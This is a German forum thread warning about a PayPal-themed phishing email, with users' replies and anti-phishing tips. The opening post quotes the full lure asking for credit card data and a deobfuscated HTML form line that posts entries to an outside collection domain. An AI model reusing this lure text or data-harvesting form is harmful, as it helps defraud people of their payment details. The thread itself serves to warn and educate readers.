Phishing Warnung: Angebliche Paypal Bonitätsprüfung mit Kreditkarte

  • Antworten:10
  • OffenNicht stickyNicht beantwortet
  • Forum-Beiträge: 2.243

21.11.2011, 10:28:23 via Website

Moin Leute,

ich hab heute eine wirklich gut gemachte Phishing Mail angeblich von Paypal bekommen, wo ich denke, dass da viele drauf eingehen würden. Daher hier mal eine Warnung.

Guten Tag,

aufgrund einer automatisierten Bonitätsprüfung Ihrer Adressdaten wurde das Risiko eines Zahlungsausfalls für Ihr Konto als überdurchschnittlich hoch eingestuft.
Um weiterhin problemlos die Zahlungsmethode Bankeinzug nutzen zu können, bitten wir Sie eine Kreditkarte - als Sicherheit bei Zahlungsausfällen - bei uns zu registrieren.


Ihre Kreditkartendaten können Sie mithilfe des beigefügten Formulars hinterlegen.
Die Kreditkarte dient lediglich als Absicherung bei einem nicht ausreichend gedeckten Bankkonto, und wird nicht als weitere Zahlungsmethode hinzugefügt.
Sollten sie keine Kreditkarte bei uns hinterlegen, wird die Zahlungsmethode Bankeinzug für Ihr Konto deaktiviert.

Es ist dabei irrelevant ob Sie bereits eine Kreditkarte bei uns registriert haben, aus vertragsrechtlichen Gründen dürfen wir diese Kartendaten nicht als zusätzliche Sicherheit heranziehen.
Sie können also eine Karte, welche bereits bei uns registriert ist, auch als Sicherheit hinterlegen.

Nach der erfolgreichen Registrierung werden Sie auf die PayPal Seite weitergeleitet und können Ihr Konto weiterhin wie gewohnt benutzen.

Herzliche Grüße
Ihr PayPal-Team

Im Anhang der Mail findet sich eine html Datei mit einem Formular wo man seine Daten eingeben soll.
Das HTML ist obfuscated, aber nach ein wenig reverse-engineering hab ich folgendes da drin gefunden.

1<form action="http://tour-expert.net/bleu-ocean-indien.com/get2.php" method="post" target="_blank">

Ich denke das sagt schon alles :)
Die Daten gehen an eine komische Domain am Arsch der Welt.

Also Leute: Vorsicht! Kopf an bei sowas!

Antworten
  • Forum-Beiträge: 458

21.11.2011, 10:34:12 via App

genau das habe ich gestern Abend auch bekommen !! um 23:49

Wer Rechtschreibfehler findet, darf sie behalten.

Antworten
  • Forum-Beiträge: 3.112

21.11.2011, 10:50:41 via Website

Werden solche Nachrichten nicht von Eurem Spam-Filter abgefangen?
Und wenn es dann doch durch kommen sollte, sollte Eure E-Mail-Client eine Phishing Warnung ausliefern.
Und wenn man trotzdem noch den Link folgt sollte einem auffallen, dass die Adressleiste nicht grün eingefärbt ist.

Mittlerweile gibt es so viele Mechanismen, die das Internet sicherer machen, es sind eigentlich immer nur 2-3 Dinge zu beachten, dann kann man bei so etwas nicht hereinfallen.
Ich denke es ist sinnvoller den Leuten zu sagen auf was sie achten müssen (zB. nur wichtige Daten eingeben, wenn auch die Adressleiste links oben grün eingefärbt ist und der richtige Anbieter angezeigt wird), anstatt vor jeder Phishing-Mail zu warnen.

Luigi

Antworten
  • Forum-Beiträge: 2.243

21.11.2011, 10:54:17 via Website

Es gibt keine Adressleiste weil das Formular als HTML direkt in die Mail eingebettet ist und die Mail wurde weder bei GMX, noch bei Strato gefiltert.
Ist halt zur Abwechslung echt mal eine Phishing Mail mit Hand und Fuß.

Lieber einmal zu viel drauf hinweisen, als dass jemand hier auf sowas reinfällt.

Ich wette die Drahtzieher dahinter werden inzwischen mehr als genug Daten gesammelt haben.

Antworten
  • Forum-Beiträge: 1

16.03.2012, 08:38:17 via Website

Hallo,
ich bin noch nicht allzu lange bei PayPal und bin auch kein Computer-Crack.....komm halt so klar mit dem was ich brauche.

Habe nun gestern auch so eine, wie ich finde, verstörende Mail bekommen.
Wenn ich mir die vorherigen Beiträge so durchlese (auch wenn ich manchmal nicht alles verstehe :) ) dann würde ich das so verstehen, dass ich darauf nicht antworten muss und auch keine Kreditkarte hinterlegen muss????

Würde mich übelst freuen, wenn mir das nochmal wer bestätigen oder ggf. korrigieren könnte....

Dankeschööön im VOraus!!!!!

Antworten
  • Forum-Beiträge: 2.243

16.03.2012, 08:46:43 via Website

Hab gestern auch wieder so eine Mail bekommen.
Diesmal enthielt sie jedoch ein paar Fehler.

Zum einen war "paypal" klein geschrieben. Das würde eBay nie machen :)
Zum anderen kam sie auf eine eMail Adresse, mit der ich NICHT bei Paypal registriert bin.

Also einfach immer mit Vorsicht und gesundem Menschenverstand an so eine Sache rangehen, dann kommt man meist selbst drauf, dass da war faul ist.
Banken und andere Zahlungsstellen werden in der Regel nie per Mail um Kreditkartendaten / Kontodaten / PINs / TANs etc. bitten !

Am besten dann direkt löschen und auch nicht nur zum Testen die Links anklicken.
Kann ja gut sein, dass die verlinkten Seiten mit Trojanern gespickt sind, für die man grade noch kein Update drauf hat.

Antworten
  • Forum-Beiträge: 1

01.10.2012, 16:44:04 via Website

Hallo,

ich habe auch eine solche Nachricht bekommen. Der Knaller aber ist, dass sie an meine Paypal Emailadresse kam, jedoch namentlich mein Schwager genannt war. Sogar seine Kontonummer stimmt in der Mail.

So hieß es in der Mail:

Sehr geehrter "sein Vorname, Zuname",
aufgrund eines automatisierten Abgleiches Ihrer Kundendaten mit Vergleichsstatistiken wurde das Risiko eines Zahlungsausfalls für Ihr Konto "seine Kontonummer bei der Sparkasse" als überdurchschnittlich

Diesen Zufall fanden wir sehr, sehr seltsam und so haben wir uns überlegt, wie das zustande gekommen sein kann. Der einzige gemeinsame Nenner war, dass ich ihm vor einigen Monaten einmal meine Zugangsdaten für den Filehoster "Share-Online" gegeben hatte und er diesen dann über eine Paypal-Zahlung mit seinem Paypal-Konto verlängert hatte.

Ist sonst jemand von Euch Kunde bei Share-Online gewesen oder noch immer?
Ich will denen nichts unterstellen, aber dies ist für mich die einzige Verbindung, die ich sehe. Gibt/gab es dort vielleicht irgendwelche Sicherheitslücken oder gar bewusste Weitergaben vertraulicher Daten?

Mit freundlichen Grüßen
Dennis

— geändert am 01.10.2012, 16:44:40

Antworten
  • Forum-Beiträge: 18.575

01.10.2012, 16:46:56 via Website

Dennis Bern
H

1.)Ist sonst jemand von Euch Kunde bei Share-Online gewesen oder noch immer?
2.) Ich will denen nichts unterstellen, aber dies ist für mich die einzige Verbindung, die ich sehe.
Zu1.) nein
Zu2.) Könnte stimmen
ich habe sowas nämlich noch nie von "angeblich" PayPal erhalten.

— geändert am 01.10.2012, 16:47:28

** Android in seinem Lauf hält weder Ochs noch Esel auf **

Antworten
  • Forum-Beiträge: 11.649

01.10.2012, 17:17:56 via App

Ich ebenfalls nich und wenn egal hab eh keine kreditkarte
Danke für den Hinweis

Die Warheit schmeckt gut wenn man den Bauch voller Lügen hat! ~Muhammad Ali~

Antworten

Empfohlene Artikel